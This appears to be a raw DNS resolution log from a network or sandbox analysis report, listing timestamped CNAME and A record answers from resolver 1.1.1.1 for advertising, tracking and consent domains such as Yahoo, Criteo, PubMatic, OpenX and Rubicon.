                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564635992 CEST1.1.1.1192.168.2.40x402aNo error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.564635992 CEST1.1.1.1192.168.2.40x402aNo error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.750334024 CEST1.1.1.1192.168.2.40x11aNo error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.750334024 CEST1.1.1.1192.168.2.40x11aNo error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.750334024 CEST1.1.1.1192.168.2.40x11aNo error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.750334024 CEST1.1.1.1192.168.2.40x11aNo error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.406505108 CEST1.1.1.1192.168.2.40x900dNo error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.406505108 CEST1.1.1.1192.168.2.40x900dNo error (0)static.nl3.vip.prod.criteo.net178.250.1.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.870398998 CEST1.1.1.1192.168.2.40xababNo error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)prebid.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887700081 CEST1.1.1.1192.168.2.40xc70bNo error (0)nld-prebid.a-mx.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.887711048 CEST1.1.1.1192.168.2.40x6302No error (0)prebid.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.889609098 CEST1.1.1.1192.168.2.40xafa6No error (0)prebid.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)prebid.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.890389919 CEST1.1.1.1192.168.2.40xc078No error (0)nld-prebid.a-mx.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:24.430896997 CEST1.1.1.1192.168.2.40x7fa0No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:24.431200981 CEST1.1.1.1192.168.2.40x29d2No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:24.431200981 CEST1.1.1.1192.168.2.40x29d2No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:24.431200981 CEST1.1.1.1192.168.2.40x29d2No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.101207972 CEST1.1.1.1192.168.2.40x4b21No error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.101521969 CEST1.1.1.1192.168.2.40x5549No error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.301450014 CEST1.1.1.1192.168.2.40x26a0No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.301450014 CEST1.1.1.1192.168.2.40x26a0No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.301450014 CEST1.1.1.1192.168.2.40x26a0No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.301450014 CEST1.1.1.1192.168.2.40x26a0No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.302005053 CEST1.1.1.1192.168.2.40xc08No error (0)cm.g.doubleclick.net142.250.186.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.789315939 CEST1.1.1.1192.168.2.40x9670No error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.790044069 CEST1.1.1.1192.168.2.40x7a93No error (0)assets.a-mo.netassets.a-mo.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.802859068 CEST1.1.1.1192.168.2.40x1423No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.802859068 CEST1.1.1.1192.168.2.40x1423No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.802859068 CEST1.1.1.1192.168.2.40x1423No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.803620100 CEST1.1.1.1192.168.2.40xca99No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.454252958 CEST1.1.1.1192.168.2.40xd177No error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.454252958 CEST1.1.1.1192.168.2.40xd177No error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.454252958 CEST1.1.1.1192.168.2.40xd177No error (0)prod-rotation-v2.guce.aws.oath.cloud34.249.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.454252958 CEST1.1.1.1192.168.2.40xd177No error (0)prod-rotation-v2.guce.aws.oath.cloud52.208.147.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.454252958 CEST1.1.1.1192.168.2.40xd177No error (0)prod-rotation-v2.guce.aws.oath.cloud34.240.205.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.454700947 CEST1.1.1.1192.168.2.40xcb63No error (0)guce.yahoo.comreal.rotation.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.454700947 CEST1.1.1.1192.168.2.40xcb63No error (0)real.rotation.guce.aws.oath.cloudprod-rotation-v2.guce.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.570878029 CEST1.1.1.1192.168.2.40xf3d7No error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.571058989 CEST1.1.1.1192.168.2.40xb58bNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.209.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.50.72.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.255.72.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.33.18.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.32.128.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.249.224.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.210.114.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.618366957 CEST1.1.1.1192.168.2.40xa2f7No error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.619879961 CEST1.1.1.1192.168.2.40xf7f2No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.619879961 CEST1.1.1.1192.168.2.40xf7f2No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.619879961 CEST1.1.1.1192.168.2.40xf7f2No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.646420002 CEST1.1.1.1192.168.2.40x20eNo error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.646656036 CEST1.1.1.1192.168.2.40x4dc4No error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.732989073 CEST1.1.1.1192.168.2.40x2b05No error (0)yahoo-bidout-d.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.732989073 CEST1.1.1.1192.168.2.40x2b05No error (0)yahoo-bidout-d.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.763668060 CEST1.1.1.1192.168.2.40xcf2aNo error (0)contextual.media.net88.221.168.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.865247965 CEST1.1.1.1192.168.2.40xd500No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.865247965 CEST1.1.1.1192.168.2.40xd500No error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.865816116 CEST1.1.1.1192.168.2.40xeda5No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.867518902 CEST1.1.1.1192.168.2.40x368No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.872236967 CEST1.1.1.1192.168.2.40xf8f0No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.892406940 CEST1.1.1.1192.168.2.40xfcd5No error (0)js-sec.indexww.com172.64.149.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.892406940 CEST1.1.1.1192.168.2.40xfcd5No error (0)js-sec.indexww.com104.18.38.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.892961025 CEST1.1.1.1192.168.2.40xeeedNo error (0)js-sec.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.056488037 CEST1.1.1.1192.168.2.40xd4b8No error (0)consent.cmp.oath.comconsent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.066301107 CEST1.1.1.1192.168.2.40xf4c2No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.066301107 CEST1.1.1.1192.168.2.40xf4c2No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.066301107 CEST1.1.1.1192.168.2.40xf4c2No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.066756010 CEST1.1.1.1192.168.2.40x4042No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.068916082 CEST1.1.1.1192.168.2.40x705cNo error (0)consent.cmp.oath.comconsent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.068916082 CEST1.1.1.1192.168.2.40x705cNo error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.068916082 CEST1.1.1.1192.168.2.40x705cNo error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.068916082 CEST1.1.1.1192.168.2.40x705cNo error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.068916082 CEST1.1.1.1192.168.2.40x705cNo error (0)consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud3.161.82.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289238930 CEST1.1.1.1192.168.2.40x6512No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289238930 CEST1.1.1.1192.168.2.40x6512No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289347887 CEST1.1.1.1192.168.2.40xb1feNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289347887 CEST1.1.1.1192.168.2.40xb1feNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289655924 CEST1.1.1.1192.168.2.40x874dNo error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289655924 CEST1.1.1.1192.168.2.40x874dNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net52.31.116.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289655924 CEST1.1.1.1192.168.2.40x874dNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net34.249.222.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289655924 CEST1.1.1.1192.168.2.40x874dNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net108.129.11.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.289655924 CEST1.1.1.1192.168.2.40x874dNo error (0)ds-pr-bh.ybp.gysm.yahoodns.net63.32.70.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290474892 CEST1.1.1.1192.168.2.40x28e7No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com54.205.23.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com54.146.2.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com54.162.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com54.196.10.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com54.157.243.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com54.147.108.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com52.72.202.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.290771961 CEST1.1.1.1192.168.2.40x3c0dNo error (0)sync.srv.stackadapt.com52.86.42.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.325005054 CEST1.1.1.1192.168.2.40x879aNo error (0)rtb.openx.net35.227.252.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.325005054 CEST1.1.1.1192.168.2.40x879aNo error (0)rtb.openx.net35.186.253.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.325388908 CEST1.1.1.1192.168.2.40x10d8No error (0)id.a-mx.com79.127.216.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.325388908 CEST1.1.1.1192.168.2.40x10d8No error (0)id.a-mx.com79.127.227.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.327092886 CEST1.1.1.1192.168.2.40xedcaNo error (0)image8.pubmatic.comimage8-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.327092886 CEST1.1.1.1192.168.2.40xedcaNo error (0)image8-v2.pubmnet.comimgsync-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.327092886 CEST1.1.1.1192.168.2.40xedcaNo error (0)imgsync-amsfpairbc.pubmnet.com198.47.127.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.327352047 CEST1.1.1.1192.168.2.40xc859No error (0)cm.adform.nettrack-eu.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.327474117 CEST1.1.1.1192.168.2.40x4f7No error (0)cm.adform.nettrack-eu.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.328536987 CEST1.1.1.1192.168.2.40xf503No error (0)image8.pubmatic.comimage8-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.328536987 CEST1.1.1.1192.168.2.40xf503No error (0)image8-v2.pubmnet.comimagsync-lhrpairbc.pubmatic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.328547001 CEST1.1.1.1192.168.2.40xb812No error (0)ssum.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.328547001 CEST1.1.1.1192.168.2.40xb812No error (0)ssum.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:27.328926086 CEST1.1.1.1192.168.2.40xe9afNo error (0)ssum.casalemedia.com65IN (0x0001)false
